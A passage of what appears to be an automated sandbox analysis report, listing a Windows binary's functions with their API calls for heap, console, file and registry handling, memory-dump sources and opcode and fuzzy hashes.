                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e641ab4dc69347192fbf3f04766778831f093cd16f886d5f1c398f3a2abf3687
                                                                      • Instruction ID: cf2a1ee146a6bd6b53edcc5fd07d89fde50a9dccde0d949e46947075c17befa0
                                                                      • Opcode Fuzzy Hash: e641ab4dc69347192fbf3f04766778831f093cd16f886d5f1c398f3a2abf3687
                                                                      • Instruction Fuzzy Hash: B3113431601504ABFB685B249C89FEF369AEF82328F14811AFC02C20D1DB74DD01CB91
                                                                      Function 00069809 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _get_osfhandle.MSVCRT ref: 00069822
                                                                      • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,000692EA,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0006982A
                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00069841
                                                                      • DeleteFileW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 0006986E
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: File$DeleteErrorLastWrite_get_osfhandle
                                                                      • String ID:
                                                                      • API String ID: 2448200120-0
                                                                      • Opcode ID: 8043f0f07f2cea82acb937b5b89ce61adab3834d4edfabb2015c7f3a96c7dda7
                                                                      • Instruction ID: 9ae0b7ef9b8bef4d3c2a113a88ff1d2b536daf1e0b6012817f76b106f5f44aca
                                                                      • Opcode Fuzzy Hash: 8043f0f07f2cea82acb937b5b89ce61adab3834d4edfabb2015c7f3a96c7dda7
                                                                      • Instruction Fuzzy Hash: 7611C471A00200AFEB299B65DC49ABF379EEB86B65F10402AF40697551DE7D9C80CB61
                                                                      Function 00047221 Relevance: 6.1, APIs: 4, Instructions: 61memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,?,00069962,00000000,?,00000000,0005CF94,00000000,?), ref: 0004727F
                                                                      • RtlFreeHeap.NTDLL(00000000), ref: 00047286
                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 000472AF
                                                                      • RtlFreeHeap.NTDLL(00000000), ref: 000472B6
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$FreeProcess
                                                                      • String ID:
                                                                      • API String ID: 3859560861-0
                                                                      • Opcode ID: f73a671a1a5c2aed0a1fea067dc53ecfe09fc204121f59c54195d2e3114e2944
                                                                      • Instruction ID: 37f28b9468488fa439ae3e97e8a88618aca8bb25411c1a311adc61f12b445e97
                                                                      • Opcode Fuzzy Hash: f73a671a1a5c2aed0a1fea067dc53ecfe09fc204121f59c54195d2e3114e2944
                                                                      • Instruction Fuzzy Hash: 2B11E6B16082009BEF24AF649909B7A3BE1FF86311F14446DF5DF8B252CB68D842D765
                                                                      Function 0004DD20 Relevance: 6.1, APIs: 4, Instructions: 56memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,00000000,0004BDB3,00000000,?), ref: 0004DD37
                                                                      • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 0004DD3E
                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 0004DD53
                                                                      • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 0004DD5A
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocSize
                                                                      • String ID:
                                                                      • API String ID: 2549470565-0
                                                                      • Opcode ID: 07c7408334fdca2bcdad5b990479da4e1e71d946e55099e1837ad02aa9e9eb83
                                                                      • Instruction ID: 1783fbc3e5d00b8356e0e9393720992d534136ffe896fd9db610da897edb1271
                                                                      • Opcode Fuzzy Hash: 07c7408334fdca2bcdad5b990479da4e1e71d946e55099e1837ad02aa9e9eb83
                                                                      • Instruction Fuzzy Hash: A301B5B2B002019BEB219B54EC8CF9A77A8FB85756F200037F509C7150D739DC48D795
                                                                      Function 00068496 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,?,?,?,?,?,?,?,?,?,?,00048A51), ref: 000684B9
                                                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,?,?,?,?,?,?,?,?,00048A51), ref: 000684C6
                                                                      • FillConsoleOutputAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00048A51), ref: 000684EA
                                                                      • SetConsoleTextAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,?,?,?,?,?,?,?,?,00048A51), ref: 000684F2
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: Console$Attribute$BufferFillHandleInfoOutputScreenText
                                                                      • String ID:
                                                                      • API String ID: 1033415088-0
                                                                      • Opcode ID: 9cc460acfc29f96123811325668d4c1079c020789cadb2b7e99b53b2ea97f2d7
                                                                      • Instruction ID: 3af81cd0e0924d19802c1523a8c6b4cbd2a8b0d116ef0a59ed9fe148547cae99
                                                                      • Opcode Fuzzy Hash: 9cc460acfc29f96123811325668d4c1079c020789cadb2b7e99b53b2ea97f2d7
                                                                      • Instruction Fuzzy Hash: EA014471A01119AFAB059B749C88AFFB7ECFF4E311B00412AFA02D6151EF699D06C765
                                                                      Function 00055643 Relevance: 6.0, APIs: 4, Instructions: 46fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00050060: wcschr.MSVCRT ref: 0005006C
                                                                      • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,40000000,00000000,0000000C,00000004,08000080,00000000,00000000,00000000), ref: 00055678
                                                                      • _open_osfhandle.MSVCRT ref: 0005568C
                                                                      • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 000556A2
                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 0006122B
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: CloseCreateErrorFileHandleLast_open_osfhandlewcschr
                                                                      • String ID:
                                                                      • API String ID: 22757656-0
                                                                      • Opcode ID: cd9c4200558e88f4b8f345b0ab8b275d7af8a3844a5413572456d92c97f361d2
                                                                      • Instruction ID: 247cb7609efbcfcf94e4a37bc7f439af1940ef517c876639d2fd2881dd32a4c6
                                                                      • Opcode Fuzzy Hash: cd9c4200558e88f4b8f345b0ab8b275d7af8a3844a5413572456d92c97f361d2
                                                                      • Instruction Fuzzy Hash: 3801A771904610AEE7206BA89C4DB9F7BB8E741776F204216F961E31E0D7B858458B91
                                                                      Function 000624F6 Relevance: 6.0, APIs: 4, Instructions: 36memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,000622F8), ref: 00062514
                                                                      • RtlFreeHeap.NTDLL(00000000,?,?), ref: 0006251B
                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,000622F8), ref: 00062539
                                                                      • RtlFreeHeap.NTDLL(00000000), ref: 00062540
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$FreeProcess
                                                                      • String ID:
                                                                      • API String ID: 3859560861-0
                                                                      • Opcode ID: a8a3300247d63e5ad35a73a23bb929089262408f7cb368a7055557db438887aa
                                                                      • Instruction ID: 565996e0562a5479c9c7efa7dae4918c748191453070ad0d8e1d76e7027f4fc1
                                                                      • Opcode Fuzzy Hash: a8a3300247d63e5ad35a73a23bb929089262408f7cb368a7055557db438887aa
                                                                      • Instruction Fuzzy Hash: AEF06872610601AFEB249FA0DC8CB56B7F9FF49312F10051EE141C6540D778E955CBA1
                                                                      Function 00056860 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00056F48: GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000), ref: 00056F4F
                                                                      • __set_app_type.MSVCRT ref: 00056872
                                                                      • __p__fmode.MSVCRT ref: 00056888
                                                                      • __p__commode.MSVCRT ref: 00056896
                                                                      • __setusermatherr.MSVCRT ref: 000568B7
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                      • String ID:
                                                                      • API String ID: 1632413811-0
                                                                      • Opcode ID: ec7d385918b127e51709403f5b20af62ecde65e1294e808da054b97564bb57b5
                                                                      • Instruction ID: 388b03018b9ee6a0e4671c6a4e565557091ca1c025520ac47fdaa63612a4ef70
                                                                      • Opcode Fuzzy Hash: ec7d385918b127e51709403f5b20af62ecde65e1294e808da054b97564bb57b5
                                                                      • Instruction Fuzzy Hash: 58F0FE386043408FF7146F30FD0A6453B62B706362B400A1AF861862F2EFBE9144CB02
                                                                      Function 00048235 Relevance: 6.0, APIs: 4, Instructions: 17COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _get_osfhandle.MSVCRT ref: 0004824E
                                                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00048256
                                                                      • _get_osfhandle.MSVCRT ref: 00048264
                                                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 0004826C
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: ConsoleMode_get_osfhandle
                                                                      • String ID:
                                                                      • API String ID: 1606018815-0
                                                                      • Opcode ID: cbbd9e328086bf3df2c15bf64f061f860bd2decdd0a4e1d8605c9435cea28276
                                                                      • Instruction ID: 4ac0f711cbad7fd75209a011cded1e4c0f293503e096626574d44cbd5da60ff5
                                                                      • Opcode Fuzzy Hash: cbbd9e328086bf3df2c15bf64f061f860bd2decdd0a4e1d8605c9435cea28276
                                                                      • Instruction Fuzzy Hash: 39E026B1A04604EFFB049BA0FD1DE553B64F749316B00451AF249965B1DBBD54409F12
                                                                      Function 000472C6 Relevance: 6.0, APIs: 4, Instructions: 15memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,0004729C), ref: 000472CF
                                                                      • RtlFreeHeap.NTDLL(00000000), ref: 000472D6
                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 000472DF
                                                                      • RtlFreeHeap.NTDLL(00000000), ref: 000472E6
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$FreeProcess
                                                                      • String ID:
                                                                      • API String ID: 3859560861-0
                                                                      • Opcode ID: 503802eb26ae87e1f0ea46c858f8971288494aa7bfe2881390c781bdf2762acf
                                                                      • Instruction ID: 5aa23364d2c73182bb12cfc332c0b24d45a562137a1f620df4cfa945611a16ba
                                                                      • Opcode Fuzzy Hash: 503802eb26ae87e1f0ea46c858f8971288494aa7bfe2881390c781bdf2762acf
                                                                      • Instruction Fuzzy Hash: DFD09232605110ABFE503FA0AC0DB863A28FB4A212F010402B28582660CABC48008B62
                                                                      Function 00049CC0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 191COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 0004DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0004ACD8,00000001,?,00000000,00048C23,-00000105,0006C9B0,00000240,00051E92,00000000,00000000,0005ACE0,00000000), ref: 0004DCE1
                                                                        • Part of subcall function 0004DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0004ACD8,00000001,?,00000000,00048C23,-00000105,0006C9B0,00000240,00051E92,00000000,00000000,0005ACE0,00000000,00000000), ref: 0004DCE8
                                                                        • Part of subcall function 0004A62F: wcschr.MSVCRT ref: 0004A635
                                                                        • Part of subcall function 0004C570: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 0004C5BD
                                                                        • Part of subcall function 0004C570: RtlFreeHeap.NTDLL(00000000), ref: 0004C5C4
                                                                        • Part of subcall function 0004C570: _setjmp3.MSVCRT ref: 0004C630
                                                                      • _wcsupr.MSVCRT ref: 0005C21F
                                                                        • Part of subcall function 00051A47: memset.MSVCRT ref: 00051AE2
                                                                        • Part of subcall function 00051A47: ??_V@YAXPAX@Z.MSVCRT(00052229,?,00052229,00000000,-00000105,?,00000000,00000000), ref: 00051BA4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocFree_setjmp3_wcsuprmemsetwcschr
                                                                      • String ID: FOR$ IF
                                                                      • API String ID: 3818062306-2924197646
                                                                      • Opcode ID: 54b370ff66d42696e14622cc92f427701b12dedbf370d3a6e9e819fa28e21e74
                                                                      • Instruction ID: 91545fc35c0754c8c8a302062b1c1e843bb4f817aa1a4e439ee2e7a150e929d3
                                                                      • Opcode Fuzzy Hash: 54b370ff66d42696e14622cc92f427701b12dedbf370d3a6e9e819fa28e21e74
                                                                      • Instruction Fuzzy Hash: 225115B1B007025AEBB57B78C851BBB22E2EF91754F580039ED06CB295FB66DD41C388
                                                                      Function 00065679 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Classes,00000000,02000000,?,0006CD40,0000001C,00066901), ref: 000656A8
                                                                        • Part of subcall function 0004BC30: wcschr.MSVCRT ref: 0004BCA7
                                                                        • Part of subcall function 0004BC30: iswspace.MSVCRT ref: 0004BD1D
                                                                        • Part of subcall function 0004BC30: wcschr.MSVCRT ref: 0004BD39
                                                                        • Part of subcall function 0004BC30: wcschr.MSVCRT ref: 0004BD5D
                                                                      • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000003), ref: 00065778
                                                                        • Part of subcall function 000664DB: RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,0006CD00,00000018,?,?,0005BFD6), ref: 0006650F
                                                                        • Part of subcall function 000664DB: RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(00000000,00000000,00000000,00000001,?,00000000,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,0006CD00), ref: 00066545
                                                                        • Part of subcall function 000664DB: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(00000000,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,0006CD00,00000018,?,?,0005BFD6), ref: 00066553
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: wcschr$Close$CreateOpenValueiswspace
                                                                      • String ID: Software\Classes
                                                                      • API String ID: 1047774138-1656466771
                                                                      • Opcode ID: 093e5aefc510a0822f752f10e987e883106c3db57bcbb47d73b89f76e42f66e0
                                                                      • Instruction ID: f97b71d0a7ec7030560cd012945c2a921933789ce80132efd8f66825e1ce7a23
                                                                      • Opcode Fuzzy Hash: 093e5aefc510a0822f752f10e987e883106c3db57bcbb47d73b89f76e42f66e0
                                                                      • Instruction Fuzzy Hash: BA315471F48714CBDB58ABB8EC526ED76F2AF48711F14403EE502B7291EE755C008B64
                                                                      Function 00065E03 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Classes,00000000,02000000,?,0006CCE0,0000001C,00066931), ref: 00065E32
                                                                        • Part of subcall function 0004BC30: wcschr.MSVCRT ref: 0004BCA7
                                                                        • Part of subcall function 0004BC30: iswspace.MSVCRT ref: 0004BD1D
                                                                        • Part of subcall function 0004BC30: wcschr.MSVCRT ref: 0004BD39
                                                                        • Part of subcall function 0004BC30: wcschr.MSVCRT ref: 0004BD5D
                                                                      • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000003), ref: 00065EFB
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: wcschr$CloseOpeniswspace
                                                                      • String ID: Software\Classes
                                                                      • API String ID: 2439148603-1656466771
                                                                      • Opcode ID: c851756cfe5e348a036be7c7c2d901fd2309b2041422b5617e7129bba93860e6
                                                                      • Instruction ID: b2a22cc6d9b6b5954803e027f49e8fe0dd8cb68ccd87ee4df695b1ac1a1fea73
                                                                      • Opcode Fuzzy Hash: c851756cfe5e348a036be7c7c2d901fd2309b2041422b5617e7129bba93860e6
                                                                      • Instruction Fuzzy Hash: 20316471F546148BDF58EFA8DC526EE76B2AF48711F10403EE406B7292EE765D008B68
                                                                      Function 0004AD26 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(00000000,00000104,?,00000000,00000000,?,?,0004B11F), ref: 0005CB8B
                                                                      • SetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(00000000,00000000, - ,?,00000000,00000000,?), ref: 0005CC2D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: ConsoleTitle
                                                                      • String ID: -
                                                                      • API String ID: 3358957663-3695764949
                                                                      • Opcode ID: 51dc6fdd16e8c4189956407539040cd3a831e3eb8b054b576ed990ad8963f13d
                                                                      • Instruction ID: f221d140ab8be587f7d7eef5ee1be0721d40edcdd091410b427eb2d3505a37a8
                                                                      • Opcode Fuzzy Hash: 51dc6fdd16e8c4189956407539040cd3a831e3eb8b054b576ed990ad8963f13d
                                                                      • Instruction Fuzzy Hash: 92213771B002048BE729AB2CD895BBF77E2EBC5305F18403DE8075B246DA799D86C786
                                                                      Function 00068AA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00068AC9
                                                                      • printf.MSVCRT ref: 00068B24
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@printf
                                                                      • String ID: %3d
                                                                      • API String ID: 2845598586-2138283368
                                                                      • Opcode ID: 7326be70d1dee84f0374156b8b92cf7b9436af129c2fb64f4ea530a2421291e2
                                                                      • Instruction ID: 6ea6252c5a4094524f267988dac5e081ded8e2fb4fb0d5f8bdf4163b4a899aae
                                                                      • Opcode Fuzzy Hash: 7326be70d1dee84f0374156b8b92cf7b9436af129c2fb64f4ea530a2421291e2
                                                                      • Instruction Fuzzy Hash: B70149B1640204BBF7216E959C47FDB3AAEDB85BA0F044025FB08A5082D6B5AC60C776